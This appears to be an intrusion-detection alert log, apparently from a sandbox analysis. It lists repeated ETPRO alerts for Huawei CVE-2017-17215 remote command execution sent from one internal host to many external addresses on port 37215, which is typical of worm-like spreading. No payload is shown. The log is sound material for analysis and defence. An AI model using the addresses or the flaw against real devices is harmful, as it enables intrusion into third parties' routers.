                                                    07/10/24-08:26:20.158539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4604637215192.168.2.14157.121.123.225
                                                    07/10/24-08:26:41.360429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3799237215192.168.2.14157.196.55.31
                                                    07/10/24-08:26:31.051862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5574837215192.168.2.14181.103.118.187
                                                    07/10/24-08:26:57.650241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4583437215192.168.2.14157.163.183.51
                                                    07/10/24-08:27:11.550512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629837215192.168.2.14197.84.221.106
                                                    07/10/24-08:26:29.785606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355637215192.168.2.14157.216.88.149
                                                    07/10/24-08:26:47.943853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5282437215192.168.2.1487.237.156.77
                                                    07/10/24-08:27:11.531536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966437215192.168.2.14157.165.46.1
                                                    07/10/24-08:27:05.189042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5396837215192.168.2.1441.41.121.64
                                                    07/10/24-08:26:23.290002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5866637215192.168.2.1441.237.82.63
                                                    07/10/24-08:26:36.399837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4947237215192.168.2.14132.171.204.181
                                                    07/10/24-08:26:53.125046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6007437215192.168.2.1441.52.112.153
                                                    07/10/24-08:26:14.623254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5500237215192.168.2.14157.49.115.214
                                                    07/10/24-08:27:13.921324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5334637215192.168.2.14197.83.176.158
                                                    07/10/24-08:26:36.360120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5816037215192.168.2.1459.251.88.8
                                                    07/10/24-08:26:38.557842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3852237215192.168.2.1458.61.143.38
                                                    07/10/24-08:26:53.179489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5945837215192.168.2.14197.209.32.22
                                                    07/10/24-08:26:20.155413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626437215192.168.2.1441.83.214.224
                                                    07/10/24-08:26:25.463171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5955237215192.168.2.1441.224.19.58
                                                    07/10/24-08:26:43.893458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4868437215192.168.2.14197.69.179.172
                                                    07/10/24-08:26:49.789175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4277037215192.168.2.14157.139.235.151
                                                    07/10/24-08:27:14.825721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5427237215192.168.2.14197.238.220.88
                                                    07/10/24-08:27:14.885642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4321237215192.168.2.1417.166.155.89
                                                    07/10/24-08:27:28.151143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3501837215192.168.2.14197.80.119.218
                                                    07/10/24-08:26:57.505236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4496037215192.168.2.14197.202.126.21
                                                    07/10/24-08:26:23.328153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5123837215192.168.2.14197.172.200.40
                                                    07/10/24-08:27:13.835787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4728037215192.168.2.14157.242.4.80
                                                    07/10/24-08:26:34.202394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5780837215192.168.2.14157.65.55.202
                                                    07/10/24-08:26:26.618649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4003437215192.168.2.1441.215.24.109
                                                    07/10/24-08:26:28.801759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980637215192.168.2.14212.168.131.43
                                                    07/10/24-08:27:02.756969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5917037215192.168.2.14157.232.164.194
                                                    07/10/24-08:27:22.748001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797837215192.168.2.14197.181.125.84
                                                    07/10/24-08:27:33.837652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5323237215192.168.2.14197.179.35.40
                                                    07/10/24-08:27:28.146093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3961637215192.168.2.14157.97.178.123
                                                    07/10/24-08:27:23.863444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5652037215192.168.2.14197.131.63.195
                                                    07/10/24-08:26:43.796387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669037215192.168.2.1441.22.26.248
                                                    07/10/24-08:26:25.478024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3703837215192.168.2.14131.212.181.233
                                                    07/10/24-08:26:11.168710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4306237215192.168.2.14157.255.193.204
                                                    07/10/24-08:26:41.406016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5918037215192.168.2.1480.20.4.144
                                                    07/10/24-08:27:14.836980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4072837215192.168.2.14157.9.112.82
                                                    07/10/24-08:27:02.914738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283037215192.168.2.14197.23.245.64
                                                    07/10/24-08:26:28.741388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3898237215192.168.2.1441.13.50.46
                                                    07/10/24-08:26:28.837922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4871037215192.168.2.14157.125.55.150
                                                    07/10/24-08:26:29.851044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5139437215192.168.2.14107.185.174.90
                                                    07/10/24-08:26:59.822867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5646237215192.168.2.14157.50.85.35
                                                    07/10/24-08:26:25.496138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998237215192.168.2.14157.63.118.98
                                                    07/10/24-08:26:41.606655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5931037215192.168.2.14157.22.79.252
                                                    07/10/24-08:26:53.209025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4695637215192.168.2.14157.149.59.178
                                                    07/10/24-08:26:11.557053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5289837215192.168.2.1457.42.140.234
                                                    07/10/24-08:26:14.740635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4501837215192.168.2.14203.154.240.215
                                                    07/10/24-08:27:22.765325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3899837215192.168.2.14197.249.22.206
                                                    07/10/24-08:27:20.516215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3461637215192.168.2.14157.114.180.49
                                                    07/10/24-08:26:33.223099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4615637215192.168.2.1448.111.168.84
                                                    07/10/24-08:27:22.748001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4107437215192.168.2.14164.66.217.142
                                                    07/10/24-08:27:22.918305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5022037215192.168.2.148.28.43.15
                                                    07/10/24-08:27:28.146093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838037215192.168.2.14197.219.186.9
                                                    07/10/24-08:27:22.479791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5186637215192.168.2.1441.202.128.76
                                                    07/10/24-08:26:18.001524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5029237215192.168.2.14169.202.24.116
                                                    07/10/24-08:26:28.877940TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092037215192.168.2.14188.207.22.80
                                                    07/10/24-08:26:42.384643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4397637215192.168.2.14197.23.223.79
                                                    07/10/24-08:26:43.709645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5614037215192.168.2.1436.74.53.144
                                                    07/10/24-08:27:10.662603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593837215192.168.2.14168.91.213.216
                                                    07/10/24-08:26:47.857207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4435637215192.168.2.14157.114.160.16
                                                    07/10/24-08:27:22.532375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041237215192.168.2.1441.233.11.241
                                                    07/10/24-08:27:19.302131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5775037215192.168.2.14157.227.52.23
                                                    07/10/24-08:26:15.878157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5553037215192.168.2.14157.34.157.225
                                                    07/10/24-08:27:30.461337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233437215192.168.2.14157.98.142.175
                                                    07/10/24-08:27:23.925907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4661437215192.168.2.14157.76.239.72
                                                    07/10/24-08:26:28.798485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4405837215192.168.2.14157.65.100.227
                                                    07/10/24-08:27:13.891282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4837637215192.168.2.1439.125.115.164
                                                    07/10/24-08:26:52.060125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520237215192.168.2.1441.157.183.222
                                                    07/10/24-08:26:20.176670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5111237215192.168.2.14157.187.169.95
                                                    07/10/24-08:27:27.151315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727237215192.168.2.14197.191.67.190
                                                    07/10/24-08:27:32.594360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3772637215192.168.2.1447.99.106.1
                                                    07/10/24-08:27:20.465433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913637215192.168.2.14183.96.188.59
                                                    07/10/24-08:26:22.285736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442037215192.168.2.14197.183.183.189
                                                    07/10/24-08:26:55.312291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772237215192.168.2.1492.226.0.83
                                                    07/10/24-08:26:34.243243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4041637215192.168.2.1441.34.142.181
                                                    07/10/24-08:27:11.557804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5461437215192.168.2.14157.156.80.44
                                                    07/10/24-08:27:31.540383TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3918637215192.168.2.14197.149.78.222
                                                    07/10/24-08:26:20.134396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5113437215192.168.2.1470.75.225.121
                                                    07/10/24-08:26:26.583861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4788837215192.168.2.14157.248.158.253
                                                    07/10/24-08:26:29.829740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5433037215192.168.2.14197.113.35.186
                                                    07/10/24-08:27:08.439575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5400037215192.168.2.14197.53.180.60
                                                    07/10/24-08:27:28.147749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970437215192.168.2.14197.68.129.121
                                                    07/10/24-08:26:55.337044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3679437215192.168.2.14157.250.3.37
                                                    07/10/24-08:26:41.493980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3520237215192.168.2.14157.36.66.20
                                                    07/10/24-08:27:10.595153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4818037215192.168.2.14161.112.142.207
                                                    07/10/24-08:26:28.763475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3701037215192.168.2.14157.34.118.185
                                                    07/10/24-08:27:32.580487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3972637215192.168.2.14157.44.231.116
                                                    07/10/24-08:26:59.831148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3320037215192.168.2.14157.239.33.196
                                                    07/10/24-08:26:59.864832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3919437215192.168.2.1441.15.95.226
                                                    07/10/24-08:27:05.239368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093437215192.168.2.14197.25.153.218
                                                    07/10/24-08:26:13.845095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4035237215192.168.2.14157.239.140.222
                                                    07/10/24-08:27:27.151855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3831437215192.168.2.1441.59.7.161
                                                    07/10/24-08:26:53.168197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835837215192.168.2.1441.182.250.94
                                                    07/10/24-08:26:57.646782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4866637215192.168.2.1499.129.167.10
                                                    07/10/24-08:27:19.317651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3847437215192.168.2.14157.108.178.252
                                                    07/10/24-08:26:42.168081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4617637215192.168.2.1441.140.0.215
                                                    07/10/24-08:27:07.361334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5270237215192.168.2.14157.96.179.177
                                                    07/10/24-08:27:10.647438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5743837215192.168.2.1441.111.70.244
                                                    07/10/24-08:27:27.141072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3395637215192.168.2.1441.35.3.79
                                                    07/10/24-08:26:15.837578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5475237215192.168.2.1441.5.204.44
                                                    07/10/24-08:27:31.486586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052437215192.168.2.14132.237.166.123
                                                    07/10/24-08:26:11.144777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157637215192.168.2.14197.52.39.17
                                                    07/10/24-08:27:14.819517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618837215192.168.2.14197.110.95.172
                                                    07/10/24-08:26:23.330913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4889637215192.168.2.14197.2.141.169
                                                    07/10/24-08:27:08.335280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4146037215192.168.2.14197.105.126.197
                                                    07/10/24-08:26:49.810296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5107837215192.168.2.1484.87.26.59
                                                    07/10/24-08:26:57.637421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3824637215192.168.2.1441.232.116.143
                                                    07/10/24-08:27:05.230856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5519437215192.168.2.14187.95.157.199
                                                    07/10/24-08:26:29.878263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5679837215192.168.2.1454.37.228.88
                                                    07/10/24-08:26:41.427067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5981837215192.168.2.14157.120.75.30
                                                    07/10/24-08:27:17.000608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856237215192.168.2.1441.94.20.48
                                                    07/10/24-08:26:11.576586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5442037215192.168.2.14169.11.165.80
                                                    07/10/24-08:26:15.838617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5085037215192.168.2.14185.155.118.42
                                                    07/10/24-08:27:13.815716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834237215192.168.2.14157.237.197.185
                                                    07/10/24-08:27:19.196135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4100837215192.168.2.14157.92.231.161
                                                    07/10/24-08:27:20.428275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4208237215192.168.2.1441.39.254.200
                                                    07/10/24-08:27:31.550771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3778237215192.168.2.14197.186.104.3
                                                    07/10/24-08:26:15.861470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5676637215192.168.2.14209.93.144.34
                                                    07/10/24-08:26:29.856939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834637215192.168.2.14157.190.198.52
                                                    07/10/24-08:27:08.448133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5877437215192.168.2.14197.52.206.137
                                                    07/10/24-08:26:14.784198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5007037215192.168.2.14115.158.253.187
                                                    07/10/24-08:26:23.286838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3295437215192.168.2.14197.73.48.197
                                                    07/10/24-08:26:13.753198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4119837215192.168.2.1441.233.94.62
                                                    07/10/24-08:27:17.083143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5539637215192.168.2.14157.60.39.199
                                                    07/10/24-08:26:20.134234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497437215192.168.2.14157.182.49.70
                                                    07/10/24-08:26:47.959831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5979637215192.168.2.1441.196.214.252
                                                    07/10/24-08:27:31.565038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4015837215192.168.2.14197.74.72.5
                                                    07/10/24-08:26:43.778189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3749237215192.168.2.14197.28.202.206
                                                    07/10/24-08:27:08.397659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913237215192.168.2.1441.26.240.186
                                                    07/10/24-08:26:47.908603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883237215192.168.2.14197.216.47.57
                                                    07/10/24-08:27:27.151172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6061037215192.168.2.1441.144.166.9
                                                    07/10/24-08:27:19.334471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4646437215192.168.2.1441.86.155.49
                                                    07/10/24-08:27:24.964611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967437215192.168.2.14157.86.94.103
                                                    07/10/24-08:27:23.802068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437837215192.168.2.1441.238.51.133
                                                    07/10/24-08:26:42.366312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6090237215192.168.2.1441.135.142.29
                                                    07/10/24-08:27:23.959753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3511437215192.168.2.14197.158.65.192
                                                    07/10/24-08:26:17.958835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5240637215192.168.2.1441.230.44.221
                                                    07/10/24-08:27:28.180841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5771637215192.168.2.14157.13.138.233
                                                    07/10/24-08:26:34.196325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3686037215192.168.2.1441.41.78.43
                                                    07/10/24-08:26:43.849597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3659037215192.168.2.14157.158.105.27
                                                    07/10/24-08:26:59.577459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5760237215192.168.2.1441.204.139.102
                                                    07/10/24-08:27:10.772266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3878437215192.168.2.14197.190.180.129
                                                    07/10/24-08:26:23.345555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3987237215192.168.2.14197.246.60.175
                                                    07/10/24-08:26:11.558206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5910037215192.168.2.14157.60.86.29
                                                    07/10/24-08:26:22.222070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810037215192.168.2.14171.252.180.64
                                                    07/10/24-08:27:22.472929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3662637215192.168.2.1488.170.82.71
                                                    07/10/24-08:27:30.489960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237837215192.168.2.1441.28.93.126
                                                    07/10/24-08:27:08.398717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5693637215192.168.2.14148.76.221.166
                                                    07/10/24-08:26:57.668884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5029037215192.168.2.1460.134.186.90
                                                    07/10/24-08:27:05.101728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5812637215192.168.2.14197.108.199.225
                                                    07/10/24-08:26:57.654804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3520437215192.168.2.14197.35.242.154
                                                    07/10/24-08:27:13.761969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694037215192.168.2.14197.176.159.37
                                                    07/10/24-08:26:59.822867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812437215192.168.2.1441.89.63.47
                                                    07/10/24-08:26:38.617704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3959237215192.168.2.1441.172.233.254
                                                    07/10/24-08:26:41.396531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5431837215192.168.2.14157.36.188.137
                                                    07/10/24-08:27:27.175136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3277437215192.168.2.14108.196.199.19
                                                    07/10/24-08:27:32.608891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619437215192.168.2.14165.226.214.104
                                                    07/10/24-08:26:17.941033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3353037215192.168.2.14157.106.58.60
                                                    07/10/24-08:26:23.308313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3798237215192.168.2.1441.105.154.139
                                                    07/10/24-08:27:10.576651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022837215192.168.2.14197.2.64.143
                                                    07/10/24-08:26:36.399682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5975237215192.168.2.1441.21.60.101
                                                    07/10/24-08:26:28.778339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382637215192.168.2.1441.5.196.94
                                                    07/10/24-08:26:33.161010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4617837215192.168.2.1441.79.49.82
                                                    07/10/24-08:26:11.131677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3289637215192.168.2.14221.104.140.125
                                                    07/10/24-08:27:19.170631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4388037215192.168.2.1441.132.99.12
                                                    07/10/24-08:27:24.914980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5789037215192.168.2.1441.134.238.165
                                                    07/10/24-08:26:20.119674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566837215192.168.2.1463.67.206.3
                                                    07/10/24-08:27:08.439677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5619437215192.168.2.14157.133.234.46
                                                    07/10/24-08:27:14.856517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5755237215192.168.2.14157.156.205.2
                                                    07/10/24-08:26:13.759189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4562437215192.168.2.1441.84.105.26
                                                    07/10/24-08:26:55.425503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5155637215192.168.2.14197.212.166.7
                                                    07/10/24-08:26:28.733035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4644237215192.168.2.1441.189.43.100
                                                    07/10/24-08:26:18.001692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499437215192.168.2.14143.142.143.104
                                                    07/10/24-08:26:45.658407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3778837215192.168.2.14197.5.238.173
                                                    07/10/24-08:26:59.651678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6051837215192.168.2.14192.111.37.192
                                                    07/10/24-08:26:47.774106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4208437215192.168.2.1441.129.87.219
                                                    07/10/24-08:26:17.937591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5359437215192.168.2.14197.130.188.21
                                                    07/10/24-08:27:11.556329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4089237215192.168.2.14197.105.58.241
                                                    07/10/24-08:26:52.011560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5218637215192.168.2.14157.98.248.69
                                                    07/10/24-08:27:02.770839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5096037215192.168.2.1441.5.95.67
                                                    07/10/24-08:26:17.996521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3723637215192.168.2.14199.147.16.201
                                                    07/10/24-08:26:42.374952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4163437215192.168.2.14157.130.188.143
